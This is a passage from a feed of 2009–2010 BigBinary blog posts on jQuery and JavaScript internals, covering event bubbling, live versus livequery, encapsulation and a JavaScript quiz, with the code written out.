bubble</h2><p>On a form a person can change so many things including checkbox, radio button,select menu, textarea etc. jQuery team implemented a full blown change trackerwhich would detect every single change on the form and will act accordingly.</p><p>Radio button, checkbox and select changes will be detected via change event.Here is the code.</p><pre><code class="language-javascript">click: function( e ) {var elem = e.target, type = elem.type;if ( type === &quot;radio&quot; || type === &quot;checkbox&quot; || elem.nodeName.toLowerCase() === &quot;select&quot; ) {return testChange.call( this, e );}},</code></pre><p>In order to detect changes on other fields like input field, textarea etc<code>keydown</code> event would be used. Here it the code.</p><pre><code class="language-javascript">keydown: function( e ) {var elem = e.target, type = elem.type;if ( (e.keyCode === 13 &amp;&amp; elem.nodeName.toLowerCase() !== &quot;textarea&quot;) ||(e.keyCode === 32 &amp;&amp; (type === &quot;checkbox&quot; || type === &quot;radio&quot;)) ||type === &quot;select-multiple&quot; ) {return testChange.call( this, e );}},</code></pre><p>IE has a proprietary event called <code>beforeactivate</code> which gets fired before anychange happens. This event is used to store the existing value of the field.After the click or keydown event the changed value is captured. Then these twovalues are matched to see if really a change has happened. Here is code fordetecting the match.</p><pre><code class="language-javascript">function testChange(e) {  var elem = e.target,    data,    val;  if (!formElems.test(elem.nodeName) || elem.readOnly) {    return;  }  data = jQuery.data(elem, &quot;_change_data&quot;);  val = getVal(elem);  if (val === data) {    return;  }  // the current data will be also retrieved by beforeactivate  if (e.type !== &quot;focusout&quot; || elem.type !== &quot;radio&quot;) {    jQuery.data(elem, &quot;_change_data&quot;, val);  }  if (elem.type !== &quot;select&quot; &amp;&amp; (data != null || val)) {    e.type = &quot;change&quot;;    return jQuery.event.trigger(e, arguments[1], this);  }}</code></pre><p>Here is<a href="http://github.com/jquery/jquery/commit/d42afd0f657d12d6daba6894d40226bea83fe1b6">the commit</a>that fixed this issue.</p><pre><code class="language-javascript">jQuery.event.special.change = {filters: {focusout: testChange,click: function( e ) {var elem = e.target, type = elem.type;if ( type === &quot;radio&quot; || type === &quot;checkbox&quot; || elem.nodeName.toLowerCase() === &quot;select&quot; ) {return testChange.call( this, e );}},// Change has to be called before submit// Keydown will be called before keypress, which is used in submit-event delegationkeydown: function( e ) {var elem = e.target, type = elem.type;if ( (e.keyCode === 13 &amp;&amp; elem.nodeName.toLowerCase() !== &quot;textarea&quot;) ||(e.keyCode === 32 &amp;&amp; (type === &quot;checkbox&quot; || type === &quot;radio&quot;)) ||type === &quot;select-multiple&quot; ) {return testChange.call( this, e );}},// Beforeactivate happens also before the previous element is blurred// with this event you can't trigger a change event, but you can store// information/focus[in] is not needed anymorebeforeactivate: function( e ) {var elem = e.target;if ( elem.nodeName.toLowerCase() === &quot;input&quot; &amp;&amp; elem.type === &quot;radio&quot; ) {jQuery.data( elem, &quot;_change_data&quot;, getVal(elem) );}}},setup: function( data, namespaces, fn ) {for ( var type in changeFilters ) {jQuery.event.add( this, type + &quot;.specialChange.&quot; + fn.guid, changeFilters[type] );}return formElems.test( this.nodeName );},remove: function( namespaces, fn ) {for ( var type in changeFilters ) {jQuery.event.remove( this, type + &quot;.specialChange&quot; + (fn ? &quot;.&quot;+fn.guid : &quot;&quot;), changeFilters[type] );}return formElems.test( this.nodeName );}};var changeFilters = jQuery.event.special.change.filters;}</code></pre><h2>Making submit event bubble</h2><p>In order to detect submission of a form, one needs to watch for click event on asubmit button or an image button. Additionally one can hit 'enter' usingkeyboard and can submit the form. All of these need be tracked.</p><pre><code class="language-javascript">jQuery.event.special.submit = {  setup: function (data, namespaces, fn) {    if (this.nodeName.toLowerCase() !== &quot;form&quot;) {      jQuery.event.add(this, &quot;click.specialSubmit.&quot; + fn.guid, function (e) {        var elem = e.target,          type = elem.type;        if (          (type === &quot;submit&quot; || type === &quot;image&quot;) &amp;&amp;          jQuery(elem).closest(&quot;form&quot;).length        ) {          return trigger(&quot;submit&quot;, this, arguments);        }      });      jQuery.event.add(this, &quot;keypress.specialSubmit.&quot; + fn.guid, function (e) {        var elem = e.target,          type = elem.type;        if (          (type === &quot;text&quot; || type === &quot;password&quot;) &amp;&amp;          jQuery(elem).closest(&quot;form&quot;).length &amp;&amp;          e.keyCode === 13        ) {          return trigger(&quot;submit&quot;, this, arguments);        }      });    }  },  remove: function (namespaces, fn) {    jQuery.event.remove(      this,      &quot;click.specialSubmit&quot; + (fn ? &quot;.&quot; + fn.guid : &quot;&quot;)    );    jQuery.event.remove(      this,      &quot;keypress.specialSubmit&quot; + (fn ? &quot;.&quot; + fn.guid : &quot;&quot;)    );  },};</code></pre><p>As you can see if a submit button or an image is clicked inside a form thesubmit event is triggered. Additionally keypress event is monitored and if the<a href="http://www.cambiaresearch.com/c4/702b8cd1-e5b0-42e6-83ac-25f0306e3e25/Javascript-Char-Codes-Key-Codes.aspx">keyCode</a>is 13 then the form is submitted.</p><p>live method is just pure awesome. It is great to see last few wrinkles gettingsorted out. A big <code>Thank You</code> to Justin Meyer of<a href="http://javascriptmvc.com">JavaScriptMVC</a> who submitted most of the patch forfixing this vexing issue.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Calling a method on a jQuery collection]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/hidden-feature-of-jquery-calling-a-method-on-a-jquery-collection"/>
      <updated>2010-01-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/hidden-feature-of-jquery-calling-a-method-on-a-jquery-collection</id>
      <content type="html"><![CDATA[<p>I was going through the<a href="http://jqueryfordesigners.com/adding-keyboard-navigation">Adding keyboard navigation</a>and noticed that Remi replaced this code</p><pre><code class="language-javascript">$(&quot;.coda-slider-wrapper ul a.current&quot;).parent().next().find(&quot;a&quot;).click();</code></pre><p>with this code</p><pre><code class="language-javascript">var direction = &quot;next&quot;;$(&quot;.coda-slider-wrapper ul a.current&quot;).parent()[direction]().find(&quot;a&quot;).click();</code></pre><p>I had never seen anything like that. In the above mentioned article, Remi used<code>next</code> and <code>prev</code> methods. However I wanted to know all the options I could passsince this feature is not very documented.</p><h2>Snippet from jQuery source code</h2><p>Here is code from jQuery that makes that above method work.</p><pre><code class="language-javascript">jQuery.each(  {    parent: function (elem) {      return elem.parentNode;    },    parents: function (elem) {      return jQuery.dir(elem, &quot;parentNode&quot;);    },    next: function (elem) {      return jQuery.nth(elem, 2, &quot;nextSibling&quot;);    },    prev: function (elem) {      return jQuery.nth(elem, 2, &quot;previousSibling&quot;);    },    nextAll: function (elem) {      return jQuery.dir(elem, &quot;nextSibling&quot;);    },    prevAll: function (elem) {      return jQuery.dir(elem, &quot;previousSibling&quot;);    },    siblings: function (elem) {      return jQuery.sibling(elem.parentNode.firstChild, elem);    },    children: function (elem) {      return jQuery.sibling(elem.firstChild);    },    contents: function (elem) {      return jQuery.nodeName(elem, &quot;iframe&quot;)        ? elem.contentDocument || elem.contentWindow.document        : jQuery.makeArray(elem.childNodes);    },  },  function (name, fn) {    jQuery.fn[name] = function (selector) {      var ret = jQuery.map(this, fn);      if (selector &amp;&amp; typeof selector == &quot;string&quot;)        ret = jQuery.multiFilter(selector, ret);      return this.pushStack(jQuery.unique(ret), name, selector);    };  });</code></pre><p>As you can see, a variety of selectors can be passed to jQueryCollection[].</p><p>If you want to give a try, any jQuery enabled site should perform all of thebelow mentioned code without any problem.</p><pre><code class="language-javascript">var a = $(&quot;a:first&quot;);var log = console.log;log(a[&quot;parent&quot;]());log(a[&quot;parents&quot;]());log(a[&quot;next&quot;]());log(a[&quot;prev&quot;]());log(a[&quot;nextAll&quot;]());log(a[&quot;prevAll&quot;]());log(a[&quot;siblings&quot;]());log(a[&quot;children&quot;]());log(a[&quot;contents&quot;]());</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Use end more often in jQuery while building DOM elements]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/use-end-more-often-in-jquery-while-building-dom-elements"/>
      <updated>2009-11-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/use-end-more-often-in-jquery-while-building-dom-elements</id>
      <content type="html"><![CDATA[<p>I want to create following markup dynamically using jQuery.</p><pre><code class="language-html">&lt;div&gt;  &lt;p&gt;This is p&lt;/p&gt;&lt;/div&gt;</code></pre><p>Following jQuery code will do the work.</p><pre><code class="language-javascript">$(document).ready(function () {  var div = $(&quot;&lt;div&gt;&lt;/div&gt;&quot;);  var p = $(&quot;&lt;p&gt;&lt;/p&gt;&quot;).text(&quot;this is p&quot;).appendTo(div);  $(&quot;body&quot;).append(div);});</code></pre><p>A better way to accomplish the same is presented below.</p><pre><code class="language-javascript">$(&quot;&lt;div&gt;&lt;/div&gt;&quot;)  .append(&quot;&lt;p&gt;&lt;/p&gt;&quot;)  .find(&quot;p&quot;)  .text(&quot;this is p&quot;)  .end()  .appendTo(&quot;body&quot;);</code></pre><p>Using <code>.end()</code> you can go back one level. And you can use <code>.end()</code> any number oftimes to get out of a deeply nested tag.</p><pre><code class="language-javascript">$(&quot;&lt;div&gt;&lt;/div&gt;&quot;)  .append(&quot;&lt;p&gt;&lt;/p&gt;&quot;)  .find(&quot;p&quot;)  .append(&quot;&lt;span&gt;&lt;/span&gt;&quot;)  .find(&quot;span&quot;)  .text(&quot;this is span&quot;)  .end()  .end()  .appendTo(&quot;body&quot;);</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[JavaScript Basics Quiz]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/javascript-basics-quiz"/>
      <updated>2009-10-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/javascript-basics-quiz</id>
      <content type="html"><![CDATA[<p>Let's look at some JavaScript questions.</p><h2>Question 1</h2><p>What's the output.</p><pre><code class="language-javascript">x = 90;function f() {  console.log(x);  var x = 100;}f();</code></pre><h2>Answer 1</h2><p>The result is <code>undefined</code> . In JavaScript a variable exists in the scope of afunction and that variable can be defined anywhere in the function. To find outmore about lexical scope read<a href="http://stackoverflow.com/questions/1047454/what-is-lexical-scope">here</a> and<a href="http://en.wikipedia.org/wiki/Scope_(programming)">here</a> .</p><h2>Question 2</h2><p>Go to <a href="http://www.prototypejs.org">prototype homepage</a> open firebug and executefollowing code.</p><pre><code class="language-javascript">var a = [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;];var result = &quot;\n&quot;;for (i in a) {  result += &quot;index: &quot; + i + &quot; value:&quot; + a[i] + &quot;\n&quot;;}</code></pre><p>Now go to <a href="http://jquery.com">jQuery</a> homepage and execute the same code. Noticethe difference in output. Why the difference?</p><h2>Answer 2</h2><p>Prototype adds additional methods to Array using <code>Array.prototype</code> . Thosemethods show up when you iterate through them. If you want to ignore methodsadded through <code>Array.prototype</code> then use this code.</p><pre><code class="language-javascript">var a = [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;];var result = &quot;\n&quot;;for (i in a) {  if (a.hasOwnProperty(i)) result += &quot;index: &quot; + i + &quot; value:&quot; + a[i] + &quot;\n&quot;;}</code></pre><h2>Question 3</h2><p>In order to find if an element with id <code>foo</code> is present, one can do</p><pre><code class="language-javascript">if ($(&quot;#foo&quot;).length &gt; 0) console.log(&quot;id foo is present&quot;);</code></pre><p>How can you make the conditional statement shorter.</p><h2>Answer 3</h2><p>In JavaScript following items evaluate to false in a conditional statement:undefined, null, false, empty string, NaN, 0</p><pre><code class="language-javascript">if ($(&quot;#foo&quot;)) console.log(&quot;id foo is present&quot;);</code></pre><h2>Question 4</h2><p>What is the output in this case. Notice that function bar is defined after the<code>return</code> statement.</p><pre><code class="language-javascript">function foo() {  console.log(z);  console.log(bar());  return true;  function bar() {    return &quot;this is bar&quot;;  }  var z = &quot;zzz&quot;;}foo();</code></pre><h2>Answer 4</h2><p>Output is</p><pre><code class="language-javascript">undefinedthis is bartrue</code></pre><h2>Question 5</h2><p>What's output in this case.</p><pre><code class="language-javascript">function logit(n) {  console.log(n);}for (i = 1; i &lt; 5; i++) {  setInterval(function () {    logit(i);  }, 2000);}</code></pre><h2>Answer 5</h2><p>The result would be output <code>5 5 5 5</code> and all the four output will appeartogether in one shot. Then after 2 seconds another set of similar data wouldappear. This would continue forever.</p><p>Question is why do I see the output in one single shot and why do I see value 5for all four cases.</p><p>Browsers execute JavaScript in a single thread. While that thread is busyexecuting 'for loop' the thread makes note of additional instructions likesetInterval. Since the thread is already running 'for loop', the same threadcan't run setInterval. So the thread finishes the 'for loop' and then looks upadditional tasks to be performed. It find setInterval task to be waiting. Itexecutes the function. While it is executing the function ,by virtue of closure,the value of i is 5. Hence you see <code>5 5 5 5</code> and you see all that in one singleshot.</p><p>Correct implementation would be</p><pre><code class="language-javascript">function logit(n) {  console.log(n);}var counter = 0;var timer = setInterval(function () {  logit(counter);  counter++;  if (counter == 5) {    clearTimeout(timer);  }}, 2000);</code></pre><p>Above code would print <code>0 1 2 3 4</code> at an interval of 2 seconds.</p><h2>Question 6</h2><p>What's the output in this case.</p><pre><code class="language-javascript">flight = { status: &quot;arrived&quot; };console.log(typeof flight.status);console.log(typeof flight.toString);console.log(flight.hasOwnProperty(&quot;status&quot;));console.log(flight.hasOwnProperty(&quot;toString&quot;));</code></pre><h2>Answer 6</h2><pre><code class="language-plaintext">stringfunctiontruefalse</code></pre><h2>Question 7</h2><p>What's output in this case.</p><pre><code class="language-javascript">function Person(name) {  this.name = name;}Person.prototype.welcome = function () {  return &quot;welcome &quot; + this.name;};p = new Person(&quot;John&quot;);console.log(p.welcome.call(p));o = { name: &quot;Mary&quot; };console.log(Person.prototype.welcome.call(o));</code></pre><h2>Answer 7</h2><pre><code class="language-plaintext">welcome Johnwelcome Mary</code></pre><h2>Question 8</h2><p>JavaScript has <code>Math</code> library which can be used like this</p><pre><code class="language-javascript">Math.max(6, 7, 8); // result is 8</code></pre><p>If I provide an array with certain values then how would you find the max valuefor that array.</p><pre><code class="language-javascript">a = [1, 2, 3];</code></pre><h2>Answer 8</h2><p>This answer builds up on the answer provided in #7 .</p><p>You can try this but it will fail.</p><pre><code class="language-javascript">Math.max(a); //output is NaN</code></pre><p>You can try this but it will fail too.</p><pre><code class="language-javascript">Math.max.call(Math, a); // output is NaN</code></pre><p>This will work</p><pre><code class="language-javascript">Math.max.apply(Math, a); //output is 3</code></pre><p><code>apply</code> method works because it accepts an array as the argument. <code>call</code> methodpasses the individual params to the called method directly and hence it does notwork. You can read more about JavaScript<a href="http://odetocode.com/blogs/scott/archive/2007/07/04/function-apply-and-function-call-in-javascript.aspx">apply and call methods here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[livequery in jQuery]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-live-method-works-in-jquery-why-it-does-not-work-in-some-cases-when-to-use-livequery"/>
      <updated>2009-10-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-live-method-works-in-jquery-why-it-does-not-work-in-some-cases-when-to-use-livequery</id>
      <content type="html"><![CDATA[<p><em>Following code has been tested with jQuery 1.3.2 version .</em></p><p>All the JavaScript code mentioned in this blog should be tried on firebug.</p><p>The super popular <a href="http://docs.jquery.com/Events/live">live method</a> was added tojQuery 1.3 . It works just great. Except when it does not work. As per thedocumentation this method does not work in following cases: blur, focus,mouseenter, mouseleave, change, submit .</p><h2>How binding events work in jQuery</h2><pre><code class="language-javascript">$(&quot;a&quot;).click(function () {  console.log(&quot;clicked&quot;);});</code></pre><p>In above case <code>click</code> event is bound to all the links in the <code>document</code>. jQuerystores such binding information as <code>data</code> attribute of the bound element. Thisis how I can access the list of all functions bound to an element.</p><pre><code class="language-javascript">$(&quot;a&quot;).data(&quot;events&quot;); // Object click=Object</code></pre><p>If a new link is dynamically added then that new link will not get this clickbehavior. To solve this problem I can use live method.</p><h2>Trying out live event</h2><pre><code class="language-javascript">$(&quot;a&quot;).live(&quot;click&quot;, function () {  console.log(&quot;clicked&quot;);});</code></pre><p>If I add a new <code>a</code> tag dynamically then that tag will automatically get the newclick behavior. That's great.</p><p>Just like the previous section, now I am going to find the events bound to <code>a</code>element. However when I execute following code I get <code>undefined</code> .</p><pre><code class="language-javascript">$('a').data('events')); //undefined</code></pre><p>Why is that. In the previous section I showed that all the events bound to anelement are stored as the data attribute of that element. Well, live isdifferent. live events are not bound to the element directly. They are bound tothe top level 'document'. I can verify this by trying out this code</p><pre><code class="language-javascript">jQuery.data(document, &quot;events&quot;).live; //Object</code></pre><h2>How does live method work</h2><p>live methods do not set anything on elements directly. All the event handlersare set at the document level. It means that in order for live methods to work,event bubbling is required. If you don't know what event bubbling is then<a href="http://www.quirksmode.org/js/events_order.html">read her</a> . It also means thatevent should not be stopped while it is propagating to document. If eventpropagation is stopped then event handlers bound at the document level willnever know about that event and live method will fail.</p><p>The strategy to let someone else deal with the event is called<code>event delegation</code>.</p><p>When live method is called then a binding is done at the document level. Looselytranslated this is what is basically happening.</p><pre><code class="language-javascript">$(document).bind(&quot;click&quot;, function (event) {  var $target = $(event.target);  if ($target.is(&quot;p&quot;)) {    console.log(&quot;p was clicked&quot;);  }});</code></pre><p>As you can see when a click on <code>p</code> event bubbles all the way to the top thenthat event is captured by document and necessary action is taken if the targetelement matches.</p><p>It is clear that if the click event is stopped before it reaches document thenlive method will not work. I will show you an example.</p><pre><code class="language-html">&lt;div id=&quot;parent&quot;&gt;  Languages  &lt;p&gt;Java&lt;/p&gt;  &lt;p&gt;Javascript&lt;/p&gt;&lt;/div&gt;</code></pre><pre><code class="language-javascript">$(&quot;p&quot;).live(&quot;click&quot;, function (e) {  console.log(&quot;p was clicked&quot;);});</code></pre><p>If I click on <code>Java</code> or <code>Javascript</code> I get a message on console. live is workinggreat. Now I'll stop the event propagation when event reaches to div.</p><pre><code class="language-javascript">$(&quot;p&quot;).live(&quot;click&quot;, function (e) {  console.log(&quot;p was clicked&quot;);});$(&quot;#parent&quot;).click(function (e) {  console.log(&quot;stopping propagation&quot;);  e.stopPropagation();});</code></pre><p>Now you will notice that live is no more working.</p><h2>live does not work when event bubbling is not supported</h2><p>In the previous section I showed that when event does not bubble up to documentthen live fails. It means that all the events that do not bubble will not work.Which means that events like blur, focus, mouseenter, mouseleave, change andsubmit which do bubble in IE will not work in IE. However note that these eventswill continue to work in Firefox.</p><pre><code class="language-html">&lt;select id=&quot;lab1a&quot; name=&quot;sweets&quot; multiple=&quot;multiple&quot;&gt;  &lt;option&gt;Chocolate&lt;/option&gt;  &lt;option selected=&quot;selected&quot;&gt;Candy&lt;/option&gt;  &lt;option&gt;Taffy&lt;/option&gt;  &lt;option selected=&quot;selected&quot;&gt;Caramel&lt;/option&gt;  &lt;option&gt;Fudge&lt;/option&gt;  &lt;option&gt;Cookie&lt;/option&gt;&lt;/select&gt;&lt;div id=&quot;lab1b&quot; style=&quot;color:red;&quot;&gt;&lt;/div&gt;</code></pre><pre><code class="language-javascript">$(&quot;#lab1a&quot;).live(&quot;change&quot;, function () {  var str = &quot;&quot;;  $(&quot;select option:selected&quot;).each(function () {    str += $(this).text() + &quot; &quot;;  });  $(&quot;#lab1b&quot;).text(str);});</code></pre><p>Above code will work in firefox but it will not work in IE.</p><p>Here is an example of an event that does not work in IE: onchange event.</p><p>DOM models suggest that<a href="http://msdn.microsoft.com/en-us/library/ms536912%28VS.85%29.aspx">onchange event should bubble</a>. However msdn documentation clearly says that<a href="http://msdn.microsoft.com/en-us/library/ms536912%28VS.85%29.aspx">onchange event does not bubble</a>.</p><h2>Make all the live method problems go away</h2><p>To recap live method will not work in following cases:</p><ul><li>live method works on event propagation, if an event is stopped while it isbubbling then live will not work.</li><li>IE does not support bubbling for certain events. live method on those eventswill not work in IE.</li></ul><p>There is a way to get around to both the problems.</p><p><a href="http://brandonaaron.net/code">Brandon Aaron</a> developed<a href="http://docs.jquery.com/Plugins/livequery">livequery plugin</a> which was finallymerged into jQuery as live method. livequery plugin solves both the problemslisted above and the code works in IE too.</p><p>First step is to include this plugin</p><pre><code class="language-html">&lt;script  src=&quot;http://github.com/brandonaaron/livequery/raw/master/jquery.livequery.js&quot;  type=&quot;text/javascript&quot;&gt;&lt;/script&gt;</code></pre><p>Now try this code.</p><pre><code class="language-javascript">$(&quot;p&quot;).livequery(&quot;click&quot;, function (e) {  alert(&quot;p was clicked&quot;);});$(&quot;#parent&quot;).click(function (e) {  alert(&quot;stopping progpagation&quot;);  e.stopPropagation();});$(&quot;#lab1a&quot;).livequery(&quot;change&quot;, function () {  var str = &quot;&quot;;  $(&quot;select option:selected&quot;).each(function () {    str += $(this).text() + &quot; &quot;;  });  $(&quot;#lab1b&quot;).text(str);});</code></pre><pre><code class="language-html">&lt;select id=&quot;lab1a&quot; name=&quot;sweets&quot; multiple=&quot;multiple&quot;&gt;  &lt;option&gt;Chocolate&lt;/option&gt;  &lt;option selected=&quot;selected&quot;&gt;Candy&lt;/option&gt;  &lt;option&gt;Taffy&lt;/option&gt;  &lt;option selected=&quot;selected&quot;&gt;Caramel&lt;/option&gt;  &lt;option&gt;Fudge&lt;/option&gt;  &lt;option&gt;Cookie&lt;/option&gt;&lt;/select&gt;&lt;div id=&quot;lab1b&quot; style=&quot;color:red;&quot;&gt;&lt;/div&gt;&lt;div id=&quot;parent&quot;&gt;  Languages  &lt;p&gt;Java&lt;/p&gt;  &lt;p&gt;Javascript&lt;/p&gt;&lt;/div&gt;</code></pre><p>If I click on 'Java' or 'Javascript' I will get proper response even thoughevent propagation is being stopped. Also even though change event does notbubble in IE, above code works in IE.</p><p>livequery works because livequery ,unlike live, method does not do binding atthe document level. livequery does binding at the element level. You can findthat out by running following code.</p><pre><code class="language-javascript">$(&quot;p&quot;).data(&quot;events&quot;);</code></pre><p>Above code will produce result if I am using livequery. Above code will notproduce any result if I am using live method.</p><p>The key piece of code in the plugin that makes all this work is</p><pre><code class="language-javascript">// Create a timeout to check the queue and actually run the Live Queries$.livequery.timeout = setTimeout($.livequery.checkQueue, 20);</code></pre><p>Every 20 milliseconds livequery runs all the bindings defined in livequery andthen binds the matched element with the event.</p><p>By understanding the internals of how live and livequery are implemented, nowyou can choose to use livequery in certain cases where live will not work. Alsoit helps to understand how live actually works.</p><h2>Live method finds elements and then throws it away. Not very efficient.</h2><p>A typical use of live method is something like this.</p><pre><code class="language-javascript">$(&quot;p&quot;).live(&quot;click&quot;, function (e) {  console.log(&quot;p was clicked&quot;);});</code></pre><p>As it has already been discussed a live method registers events at documentlevel.</p><p>However when <code>$('p').live(...)</code> is evaluated then jQuery first goes and findsall the <code>p</code> elements. And then what does it do with those elements. Nothing.That's right. jQuery throws away all those <code>p</code> elements which were just foundwithout using them. What a waste.</p><p>If your application has a lot of live methods and this might slow down theperformance of the application.</p><p>A better solution would have been to design an API like this one:</p><pre><code class="language-javascript">$.live('p', 'click', function(){..});~~~jQuery is flexible and I can create my own live method but it will add to the confusion. Another solution would be to make the call to live method without first finding all those `p` element. Here is how it can be done.~~~javascriptvar myDocument = $(document);myDocument.selector = 'p';myDocument.live('click', function(){  console.log('p was clicked');});</code></pre><p>In the above case no element will be selected only to be thrown away. This ismuch better.</p><h2>Seeing is believing</h2><p>In the previous section, I showed how live method can be made to work withoutfirst selecting the elements. However a friend of mine asked me if I couldconclusively prove that in the real live method a find is <em>actually</em> done. Andin my solution a find call is <em>not</em> done.</p><p>Here I am showing you the overriding <em>find</em> method. In this method I amoverriding the original find method. I will put a log message before passing thefind method to the original method.</p><pre><code class="language-javascript">(function () {  var originalFindMethod = jQuery.fn.find;  jQuery.fn.find = function () {    console.log(&quot;find was called&quot;);    originalFindMethod.apply(this, arguments);  };})();$(document).ready(function () {  $(&quot;p&quot;).live(&quot;click&quot;, function () {    console.log(&quot;p was clicked&quot;);  });});</code></pre><p>In the above case you will get message on firebug console confirming that findis indeed invoked when live method is called.</p><p>Here is revised version of live. Try this one.</p><pre><code class="language-javascript">(function () {  var originalFindMethod = jQuery.fn.find;  jQuery.fn.find = function () {    console.log(&quot;find was called&quot;);    originalFindMethod.apply(this, arguments);  };})();$(document).ready(function () {  var myDocument = $(document);  myDocument.selector = &quot;p&quot;;  myDocument.live(&quot;click&quot;, function () {    console.log(&quot;p was clicked&quot;);  });});</code></pre><p>Above version does not print 'find was called'.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Encapsulation in JavaScript]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/encapsulation-in-javascript"/>
      <updated>2009-10-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/encapsulation-in-javascript</id>
      <content type="html"><![CDATA[<p>JavaScript does not allow you to define a method as public or private. This is alimitation users need to get around to, because in real life you don't want toexpose all methods as public method.</p><p>Here is a simple implementation of the case where you want to verify input code.</p><pre><code class="language-javascript">function verifycode(code) {  console.log(code.length);  return code.length == 4 ? true : false;}function info(code) {  if (verifycode(code)) {    console.log(code + &quot; is valid&quot;);  } else {    console.log(code + &quot; is wrong&quot;);  }}info(&quot;abcd&quot;);info(&quot;rty&quot;);</code></pre><p>In the above implementation anyone can call the method verifycode. Not good.Here is one way to fix this problem.</p><pre><code class="language-javascript">var Lab = Lab || {};Lab = (function () {  var verifycode = function (code) {    console.log(code.length);    return code.length == 4 ? true : false;  };  return {    info: function (code) {      if (verifycode(code)) {        console.log(code + &quot; is valid&quot;);      } else {        console.log(code + &quot; is wrong&quot;);      }    },  };})();Lab.info(&quot;abcd&quot;);Lab.info(&quot;rty&quot;);Lab.verifycode(&quot;abcd&quot;); //verifycode is private</code></pre><p>Another way to solve the same problem would be to create a constructor function.Here is an implementation.</p><pre><code class="language-javascript">function Lab(code) {  this.code = code;  var verifycode = function () {    return code.length == 4 ? true : false;  };  this.info = function () {    if (verifycode()) {      console.log(code + &quot; is valid&quot;);    } else {      console.log(code + &quot; is wrong&quot;);    }  };}new Lab(&quot;abcd&quot;).info();</code></pre><p>Here is another way to solve the same problem. In this case I have moved all thepublic methods to prototype.</p><pre><code class="language-javascript">function Lab(code) {  this.code = code;  this.verifycode = function () {    l = code.length;    return l == 4 ? true : false;  };}Lab.prototype.info = function () {  if (this.verifycode()) {    console.log(this.code + &quot; is valid&quot;);  } else {    console.log(this.code + &quot; is wrong&quot;);  }};new Lab(&quot;abcd&quot;).info();</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Integrating JavaScriptLint with mvim]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/integrating-javascriptlint-with-mvim-and-getting-rid-of-annoying-warnings"/>
      <updated>2009-09-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/integrating-javascriptlint-with-mvim-and-getting-rid-of-annoying-warnings</id>
      <content type="html"><![CDATA[<p>I use <a href="http://www.javascriptlint.com">JavaScriptLint</a> along with<a href="http://www.vim.org/scripts/script.php?script_id=2578">JavaScriptLint.vim</a> onmvim to catch any JavaScript syntax error or missing semicolons. It works greatexcept in cases when I am chaining methods like this.</p><pre><code class="language-javascript">var select_col1 = $(&quot;&lt;select&gt;&lt;/select&gt;&quot;)  .addClass(&quot;ram_drop_down&quot;)  .addClass(&quot;ram_drop_down_col1&quot;)  .attr(&quot;name&quot;, &quot;adv_search[&quot; + random_num + &quot;_row][col1]&quot;)  .attr(&quot;id&quot;, random_num + &quot;_ram_drop_down_col1&quot;);</code></pre><p>In such cases JavaScriptLint had warnings for me.</p><pre><code class="language-plaintext">unexpected end of line. It is ambiguous whether these lines are part of the same statement.</code></pre><p>JavaScriptLint wants me to put the dot at the end of the line and not at thebeginning of the line. Well, I like having dots at the beginning of lines and Iwanted to turn off such warning.</p><p>JavaScriptLint comes with a default config file. I copied the config file to apersonal directory and disabled the warning.</p><pre><code class="language-plaintext">before: +ambiguous_newlineafter: -ambiguous_newline</code></pre><p>Also I had to comment out <code>+process jsl-test.js</code> at the very bottom. Now tellyour plugin to use this configuration file rather than the default one. Add thefollowing line to your vimrc file.</p><pre><code class="language-plaintext">let jslint_command_options = '-conf &quot;/Users/neeraj/vim/plugin/jslint/jsl.custom.conf&quot; -nofilelisting -nocontext -nosummary -nologo -process'</code></pre><p><a href="http://github.com/neerajsingh0101/vim/tree/master">This is the vim settings</a> Iuse and it has been configured to take care of it. Just go to <code>vimrc.local</code> andchange the path to your config file. Also don't forget to remove <code>&quot;</code> at thebeginning of the line to uncomment it.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Wrapping functions with self invoking jQuery]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/wrap-your-function-with-self-invoking-jquery-instead-of-performing-find-replace"/>
      <updated>2009-09-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/wrap-your-function-with-self-invoking-jquery-instead-of-performing-find-replace</id>
      <content type="html"><![CDATA[<p><em>Following code is tested with jQuery 1.3 .</em></p><p>I have following code which depends on jQuery.</p><pre><code class="language-javascript">var Search = {  initAction: function ($elm) {    if ($elm.attr(&quot;value&quot;).length === 0) {      $elm.attr(&quot;value&quot;, &quot;search&quot;);    }  },  blurAction: function ($elm) {    if ($elm.attr(&quot;value&quot;) === &quot;search&quot;) {      $elm.attr(&quot;value&quot;, &quot;&quot;);    }  },};Search.initAction($(&quot;#query_term_input&quot;));Search.blurAction($(&quot;#query_term_input&quot;));</code></pre><p>Everything is cool.</p><p>Next, company decides to use a cool JavaScript widget that depends on Prototypelibrary. After adding the Prototype library my code starts failing. I have beenasked to fix my code.</p><p>I can obviously go through the code and do a mass find <code>$</code> and replace $ with<code>jQuery</code>. This is error prone.</p><p>A better solution would be to make use of<a href="understanding-jquery-plugin-pattern-and-self-invoking-javascript-function">self invoking function</a>and redefine <code>$</code> to <code>jQuery</code> .</p><pre><code class="language-javascript">var Search = (function ($) {  return {    initAction: function ($elm) {      if ($elm.attr(&quot;value&quot;).length === 0) {        $elm.attr(&quot;value&quot;, 